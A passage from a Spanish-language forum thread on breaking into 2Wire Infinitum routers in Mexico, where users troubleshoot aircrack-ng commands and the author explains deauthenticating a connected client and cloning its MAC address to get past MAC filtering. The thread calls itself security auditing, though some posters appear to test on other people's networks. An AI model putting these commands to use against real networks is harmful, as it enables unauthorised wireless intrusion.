Hacking de routers INFINITUM (2Wire) en Mexico

Iniciado por ingegomez, 6 Agosto 2007, 21:32 PM

0 Miembros y 6 Visitantes están viendo este tema.

foxpan

hola ingegomez felicidades por los aportes aqui puestos  una pregunta trato de seguir su manual peor aqui el problema radica en que el airodump no campura nada como sera posible eso si tengo a 5 metros el router de mi red auditada tengo una tarjeta bradcom 4311 peor aunque logro poner con wifislax en modo monitor mi tarjeta y le instalo los driver que viene por defecto en el live para bradcom para reinyectar y todo el airodump se queda escaneando las redes canal por canal por horas y no camptura nada que podre hacer y reinicio en mi win xp y tenog 5 rayas de pontencia que problema tendre tambine me dice que no tenog acceso al ap y meto los compandos tambine ara prender el wifi y ni asi que podra ser saludos!

guiligan1981

Gracias por el aporte,

Disculpa mi ignorancia, pero que debo hacer si mis redes no presentan trafico gracias por tu ayuda!!

ingegomez

Reinyectar, para ello los comandos estan bien detallados con el aireplay-ng, lee el articulo completo, esta en la primer hoja... Saludos!
Autor: Ing. M. "Linksys" Gómez
Consultor de Redes y Telecomunicaciones.
Veracruz, México.
http://www.ingegomez.blogspot.com

  .' ' `.
: :'   :
`. ``
    `-
Ubuntu Server 7.10

guiligan1981

#73
Hola pues yo de nuevo, bueno ya hice mis pruebas con wifislax y ahora haber si alguien resuelve mis dudas:

1) El netstumbler no me funciono con windows vista me dice que los dispositivos no son compatibles, asi que opte por usar windows xp de otra maquina y la red que pretendo esta entre 80 y 70 db.¿existe otro programa compatible con windows vista para medir la señal wi-fi?

2) Cuando hago el cambio de canal de mi tarjeta no me lo detecta, el airodump me sigue captando el trafico de todos los canales, estos son los comandos que use: "iwconfig wlan1 rate 1M channel 2" en el ejemplo era: "iwconfig eth1 rate 1M channel 6" ¿afecta que el Airodump capte todo el trafico si solamente me interesa el canal 2?

3) Este comando "ifconfig wlan1 hw ether 00:11:22:33:44:55" que funciona para cambiar la mac no me funciona me salio esto"SIOCSIFHWADDR: Invalid argument" me funciono de la siguiente manera: "ifconfig wlan1 down, macchanger -m 00:11:22:33:44:55  wlan1 ifconfig wlan1 up" y me salio esto "Current MAC: xx:xx:xx:xx:xx:xx (Edimax Technology Co., Ltd.) Faked MAC:   00:11:22:33:44:55 (Cimsys Inc)"
airmon-ng start eth1
Interface       Chipset         Driver
wlan1           Ralink b/g      rt61 (monitor mode enabled)
¿no se si funcione de esta manera.?

4) No puedo hacer la autenticacion, el codigo que pongo es: aireplay-ng -1 6 -e "INFINITUMxxxx -a xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 wlan1" me sale:
21:06:01  Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx)
21:06:01  Sending Authentication Request
21:06:04  Sending Authentication Request
21:06:06  Sending Authentication Request
21:06:09  Sending Authentication Request
21:06:11  Sending Authentication Request
21:06:13  Sending Authentication Request
21:06:16  Sending Authentication Request

Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
      Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
      the transmit rate (iwconfig <iface> rate 1M).
¿Haber si alguien me dice que  me fallo?

gracias por todo

ingegomez

#74
NOTA INICIAL.-  NO SE DEBEN PONER NI DIRECCIONES MAC NI ESSIDs EN ESTE FORO, ESO NO LO PONGAS EN TUS PREGUNTAS POR FAVOR, SUSTITUYELAS CON IDENTIFICADORES GENERICOS COMO: ESSID O EN EL CASO DE LA MAC: MACAP o XX:XX:XX:XX:XX:XX


Continuando:

2 datos:

1.- Tu comentario:   "2) Cuando hago el cambio de canal de mi tarjeta no me lo detecta, el airodump me sigue captando el trafico de todos los canales, estos son los comandos que use: "iwconfig wlan1 rate 1M channel 2" en el ejemplo era: "iwconfig eth1 rate 1M channel 6" ¿afecta que el Airodump capte todo el trafico si solamente me interesa el canal 2?"

Posible solucion: dale ifconfig wlan1 down e intenta luego poner iwconfig wlan1 rate 1M   ENTER   y checa si te da error, en caso de que hasta ahi no te de error en la siguiente linea pondras  iwconfig wlan1 channel 2  ENTER... Lo que se hizo fue bajar la tarjeta y modificar uno a uno sus valores con la tarjeta abajo. despues de esto das ifconfig wlan1 up y continuas con el cambio de mac como ya lo hiciste.



2.-  Tu comentario:  "4) No puedo hacer la autenticacion, el codigo que pongo es: aireplay-ng -1 6 -e "ESSID" -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 wlan1" me sale:
21:06:01  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX)
21:06:01  Sending Authentication Request
21:06:04  Sending Authentication Request"

posible solucion... ¿Checaste las comillas que te faltan?, y tambien posible solucion las ya marcadas:

Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
      Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
      the transmit rate (iwconfig <iface> rate 1M).

si lees con atencion lo que te dice es: 
(Traduccion parcial explicada para que puedas entender)
* El AP a auditar tiene proteccion con filtrado MAC  (Tendrias que clonar la de un cliente en vez de ponerte una falsa es decir la que te pones es falsa con formato 00:11:22:33:44:55, tendrias que buscar una de un cliente enlazado y ponerte esa mac tumbando previamente al usuario con el ataque 0 con formato aireplay-ng -0 1 -a "MAC AP" -c "MAC CLIENTE" wlan1  para poder conectarte despues suplantando la identidad del otro usuario)

*Verificar que el BSSID del AP a auditar (es decir la MAC del AP) sea el correcto

*trata de cambiar el numero de paquetes auditables con la opcion -o

*El driver no esta parcheado para reinyeccion (Esto significa que tu tarjeta puede ser que no soporte reinyeccion y por ello jamas se autenticara hasta que tengas el driver parcheado si es que existe lo cual en caso de que este sea el problema dudo que exista aun dado que el exelente de wifislax y wifiway tienen practicamente los drivers al dia).

*El ataque de reinyeccion aveces falla en algunos AP (sin solucion)

*La tarjeta no se encuentra en el mismo canal de AP (que supongo es lo que te pasa dado que no asignaste el canal previamente)

*La reinyeccion no esta soportada del todo en tarjetas con chipset HermesI, Centrino, ndiswrapper y otras (aunque esto ya actualmente se ha solucionado en ciertas tarjetas de las mencionadas)

*y la mas probable.... ESTAS DEMASIADO LEJOS DEL AP (posible solucion que cambies el RATE de transmision de datos y que te acerques!)

Ojala haya solucionado el detalle, saludos!

RECUERDEN QUE ESTE FORO ES DE AUDITORIA, HACKING, ES DECIR PONER A PRUEBA LA SEGURIDAD DE EQUIPOS PARA BUSCAR SOLUCION A LOS MISMOS....

DI NO AL CRACKING!!!
Autor: Ing. M. "Linksys" Gómez
Consultor de Redes y Telecomunicaciones.
Veracruz, México.
http://www.ingegomez.blogspot.com

  .' ' `.
: :'   :
`. ``
    `-
Ubuntu Server 7.10

mos-k


master58

gracias ingegomez  y a los que colaboraron para actualizar este tema, a la primera funciono tal y como se describe en el primer post,

saludos!!

ingegomez

me alegra que les este funcionando este manual de auditoria, ahora recuerden que esta hecho para verificar la seguridad, ayudenos a buscarle solucion a esta deficiencia de los 2wire, hasta ahora, la forma mas eficiente para eliminar esta terrible falla de seguridad es apagar o deshabilitar la interfaz inalambrica del router 2wire cuando no este utilizandose la red inalambrica para conectarse... Saludos!
Autor: Ing. M. "Linksys" Gómez
Consultor de Redes y Telecomunicaciones.
Veracruz, México.
http://www.ingegomez.blogspot.com

  .' ' `.
: :'   :
`. ``
    `-
Ubuntu Server 7.10

kkshihack

gracias por este estupendo manual, estoy bajando ahora todos los programas para probarlo:d

master58

no tengo mas redes disponibles para checar, pero pense que solo sacaba las contraseñas que traen los modems de fabrica... vaya, que si el usuario le pone otra con caracteres (aA-zZ por ejemplo), tambien funciona este metodo? En la red en que la probe yo sabia que solo eran numeros...

saludos!